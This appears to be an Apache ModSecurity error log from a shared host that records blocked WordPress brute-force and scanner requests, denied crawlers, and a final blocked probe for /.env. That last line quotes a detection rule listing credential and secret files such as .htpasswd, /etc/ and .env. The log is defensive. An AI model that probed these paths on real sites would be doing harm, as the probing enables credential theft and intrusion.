[Tue May 26 15:59:53.574676 2026] [security2:error] [pid 762634:tid 762888] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Ibx8rj1VZMqUAOdoIAAAAHw"]
[Tue May 26 15:59:53.589043 2026] [security2:error] [pid 762634:tid 762813] [client 114.119.141.73:58639] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "obinnawrites.com"] [uri "/letyyrn/%C3%A9levage-carlin-belgique"] [unique_id "ahV2Ibx8rj1VZMqUAOdoKwAAADE"], referer: https://obinnawrites.com/letyyrn/%C3%A9levage-carlin-belgique
[Tue May 26 15:59:55.293098 2026] [security2:error] [pid 762634:tid 762798] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Irx8rj1VZMqUAOdoRwAAACI"]
[Tue May 26 15:59:57.333996 2026] [security2:error] [pid 762634:tid 762831] [client 103.153.130.62:52293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Jbx8rj1VZMqUAOdoegAAAEM"]
[Tue May 26 15:59:57.334151 2026] [security2:error] [pid 762634:tid 762831] [client 103.153.130.62:52293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Jbx8rj1VZMqUAOdoegAAAEM"]
[Tue May 26 15:59:57.453691 2026] [security2:error] [pid 762634:tid 762773] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Jbx8rj1VZMqUAOdoeQAAAAk"]
[Tue May 26 15:59:58.767892 2026] [security2:error] [pid 762634:tid 762764] [client 146.56.204.198:54628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.204.56.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/lib/webuploader/0.1.5/server/preview.php"] [unique_id "ahV2Jrx8rj1VZMqUAOdongAAAAA"]
[Tue May 26 15:59:59.488738 2026] [security2:error] [pid 762634:tid 762828] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2J7x8rj1VZMqUAOdoqQAAAEA"]
[Tue May 26 16:00:00.833485 2026] [security2:error] [pid 762634:tid 762885] [client 106.219.85.83:17455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2KLx8rj1VZMqUAOdo1QAAAHk"]
[Tue May 26 16:00:00.833616 2026] [security2:error] [pid 762634:tid 762885] [client 106.219.85.83:17455] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2KLx8rj1VZMqUAOdo1QAAAHk"]
[Tue May 26 16:00:01.840217 2026] [security2:error] [pid 762634:tid 762778] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Kbx8rj1VZMqUAOdo5wAAAA4"]
[Tue May 26 16:00:03.120966 2026] [security2:error] [pid 762634:tid 762666] [remote 74.7.241.58:41962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV2K7x8rj1VZMqUAOdpGAAAKh8"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/.quarantine
[Tue May 26 16:00:03.156716 2026] [security2:error] [pid 762634:tid 762863] [client 103.44.52.196:34864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2K7x8rj1VZMqUAOdpHAAAAGM"]
[Tue May 26 16:00:03.156855 2026] [security2:error] [pid 762634:tid 762863] [client 103.44.52.196:34864] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2K7x8rj1VZMqUAOdpHAAAAGM"]
[Tue May 26 16:00:03.352700 2026] [security2:error] [pid 762634:tid 762824] [client 106.222.227.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV2K7x8rj1VZMqUAOdpJQAAADw"]
[Tue May 26 16:00:03.353263 2026] [security2:error] [pid 762634:tid 762801] [client 106.222.227.47:12324] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV2K7x8rj1VZMqUAOdpIwAAACU"]
[Tue May 26 16:00:03.556925 2026] [security2:error] [pid 762634:tid 762816] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2K7x8rj1VZMqUAOdpGwAAADQ"]
[Tue May 26 16:00:05.094021 2026] [security2:error] [pid 762634:tid 762804] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2LLx8rj1VZMqUAOdpUAAAACg"]
[Tue May 26 16:00:07.518456 2026] [security2:error] [pid 762634:tid 762806] [client 103.153.130.62:52579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2L7x8rj1VZMqUAOdplgAAACo"]
[Tue May 26 16:00:07.518615 2026] [security2:error] [pid 762634:tid 762806] [client 103.153.130.62:52579] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2L7x8rj1VZMqUAOdplgAAACo"]
[Tue May 26 16:00:07.668815 2026] [security2:error] [pid 762634:tid 762779] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2L7x8rj1VZMqUAOdpjgAAAA8"]
[Tue May 26 16:00:07.699716 2026] [security2:error] [pid 762634:tid 762705] [remote 82.196.25.136:52574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahV2L7x8rj1VZMqUAOdplQAATUY"]
[Tue May 26 16:00:09.547086 2026] [core:crit] [pid 762634:tid 762847] (13)Permission denied: [client 157.55.39.13:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:00:09.740232 2026] [security2:error] [pid 762634:tid 762804] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Mbx8rj1VZMqUAOdpyAAAACg"]
[Tue May 26 16:00:10.026086 2026] [security2:error] [pid 762634:tid 762729] [remote 46.101.75.237:46816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahV2Mbx8rj1VZMqUAOdp2gAACV4"]
[Tue May 26 16:00:11.560959 2026] [security2:error] [pid 762634:tid 762840] [client 106.219.85.83:11739] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2M7x8rj1VZMqUAOdqDgAAAEw"]
[Tue May 26 16:00:11.561129 2026] [security2:error] [pid 762634:tid 762840] [client 106.219.85.83:11739] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2M7x8rj1VZMqUAOdqDgAAAEw"]
[Tue May 26 16:00:11.856370 2026] [security2:error] [pid 762634:tid 762804] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2M7x8rj1VZMqUAOdqDAAAACg"]
[Tue May 26 16:00:12.679959 2026] [autoindex:error] [pid 762634:tid 762886] [client 144.126.222.57:62606] AH01276: Cannot serve directory /home2/xllenm89/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 16:00:13.076767 2026] [core:crit] [pid 762634:tid 762881] (13)Permission denied: [client 40.77.167.123:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:00:13.837229 2026] [security2:error] [pid 762634:tid 762888] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Nbx8rj1VZMqUAOdqTAAAAHw"]
[Tue May 26 16:00:13.871013 2026] [security2:error] [pid 762634:tid 762866] [client 46.189.183.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Nbx8rj1VZMqUAOdqTgAAAGY"]
[Tue May 26 16:00:14.027532 2026] [security2:error] [pid 762634:tid 762779] [client 103.44.52.196:44258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Nbx8rj1VZMqUAOdqXAAAAA8"]
[Tue May 26 16:00:14.027679 2026] [security2:error] [pid 762634:tid 762779] [client 103.44.52.196:44258] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Nbx8rj1VZMqUAOdqXAAAAA8"]
[Tue May 26 16:00:14.155107 2026] [security2:error] [pid 762634:tid 762844] [client 85.208.96.208:34250] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-4th/list/"] [unique_id "ahV2Nrx8rj1VZMqUAOdqYwAAAFA"]
[Tue May 26 16:00:14.155336 2026] [security2:error] [pid 762634:tid 762844] [client 85.208.96.208:34250] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-4th/list/"] [unique_id "ahV2Nrx8rj1VZMqUAOdqYwAAAFA"]
[Tue May 26 16:00:15.920574 2026] [security2:error] [pid 762634:tid 762863] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2N7x8rj1VZMqUAOdqiQAAAGM"]
[Tue May 26 16:00:17.321258 2026] [core:crit] [pid 762634:tid 762880] (13)Permission denied: [client 52.167.144.21:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:00:17.423165 2026] [security2:error] [pid 762634:tid 762790] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2OLx8rj1VZMqUAOdqtAAAABo"]
[Tue May 26 16:00:17.897702 2026] [security2:error] [pid 762634:tid 762769] [client 103.153.130.62:52855] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Obx8rj1VZMqUAOdq1AAAAAU"]
[Tue May 26 16:00:17.897845 2026] [security2:error] [pid 762634:tid 762769] [client 103.153.130.62:52855] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Obx8rj1VZMqUAOdq1AAAAAU"]
[Tue May 26 16:00:18.837374 2026] [core:crit] [pid 762634:tid 762883] (13)Permission denied: [client 52.167.144.21:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:00:19.705180 2026] [security2:error] [pid 762634:tid 762800] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2O7x8rj1VZMqUAOdq-wAAACQ"]
[Tue May 26 16:00:21.996891 2026] [security2:error] [pid 762634:tid 762826] [client 106.219.85.83:9186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Pbx8rj1VZMqUAOdrNAAAAD4"]
[Tue May 26 16:00:21.997018 2026] [security2:error] [pid 762634:tid 762826] [client 106.219.85.83:9186] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Pbx8rj1VZMqUAOdrNAAAAD4"]
[Tue May 26 16:00:22.435431 2026] [security2:error] [pid 762634:tid 762774] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Prx8rj1VZMqUAOdrNwAAAAo"]
[Tue May 26 16:00:24.131453 2026] [security2:error] [pid 762634:tid 762830] [client 103.44.52.196:48164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2QLx8rj1VZMqUAOdrcAAAAEI"]
[Tue May 26 16:00:24.131610 2026] [security2:error] [pid 762634:tid 762830] [client 103.44.52.196:48164] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2QLx8rj1VZMqUAOdrcAAAAEI"]
[Tue May 26 16:00:24.256806 2026] [security2:error] [pid 762634:tid 762831] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2P7x8rj1VZMqUAOdrYwAAAEM"]
[Tue May 26 16:00:26.188424 2026] [security2:error] [pid 762634:tid 762788] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Qbx8rj1VZMqUAOdrpQAAABg"]
[Tue May 26 16:00:26.676213 2026] [security2:error] [pid 762634:tid 762680] [remote 51.91.98.45:41238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahV2Qrx8rj1VZMqUAOdrtwAAKi0"]
[Tue May 26 16:00:27.973065 2026] [autoindex:error] [pid 762634:tid 762770] [client 45.148.10.204:35084] AH01276: Cannot serve directory /home1/vcress4h/vcresco-usa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:00:28.175915 2026] [security2:error] [pid 762634:tid 762881] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Q7x8rj1VZMqUAOdr2wAAAHU"]
[Tue May 26 16:00:28.426678 2026] [security2:error] [pid 762634:tid 762879] [client 103.153.130.62:53138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2RLx8rj1VZMqUAOdr6QAAAHM"]
[Tue May 26 16:00:28.426876 2026] [security2:error] [pid 762634:tid 762879] [client 103.153.130.62:53138] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2RLx8rj1VZMqUAOdr6QAAAHM"]
[Tue May 26 16:00:30.332685 2026] [security2:error] [pid 762634:tid 762803] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Rbx8rj1VZMqUAOdsDQAAACc"]
[Tue May 26 16:00:31.363257 2026] [security2:error] [pid 762634:tid 762850] [client 94.31.109.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Rrx8rj1VZMqUAOdsJAAAAFY"]
[Tue May 26 16:00:31.817864 2026] [security2:error] [pid 762634:tid 762875] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2R7x8rj1VZMqUAOdsMwAAAG8"]
[Tue May 26 16:00:32.631928 2026] [security2:error] [pid 762634:tid 762836] [client 106.219.85.83:6931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2SLx8rj1VZMqUAOdsTAAAAEg"]
[Tue May 26 16:00:32.632072 2026] [security2:error] [pid 762634:tid 762836] [client 106.219.85.83:6931] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2SLx8rj1VZMqUAOdsTAAAAEg"]
[Tue May 26 16:00:33.318203 2026] [security2:error] [pid 762634:tid 762838] [client 62.60.130.233:64037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.gciamd.org.in"] [uri "/wp-login.php"] [unique_id "ahV2Sbx8rj1VZMqUAOdsWQAAAEo"], referer: https://www.facebook.com/
[Tue May 26 16:00:33.337996 2026] [security2:error] [pid 762634:tid 762881] [client 66.249.70.199:58477] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahV2Sbx8rj1VZMqUAOdsXQAAAHU"]
[Tue May 26 16:00:33.650151 2026] [security2:error] [pid 762634:tid 762791] [client 62.60.130.233:55017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.gciamd.org.in"] [uri "/wp-login.php"] [unique_id "ahV2Sbx8rj1VZMqUAOdsZAAAABs"]
[Tue May 26 16:00:33.720379 2026] [security2:error] [pid 762634:tid 762826] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Sbx8rj1VZMqUAOdsXAAAAD4"]
[Tue May 26 16:00:33.941806 2026] [security2:error] [pid 762634:tid 762711] [remote 2.57.122.173:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.ndequipments.com"] [uri "/.env"] [unique_id "ahV2Sbx8rj1VZMqUAOdsbgAAAEw"]
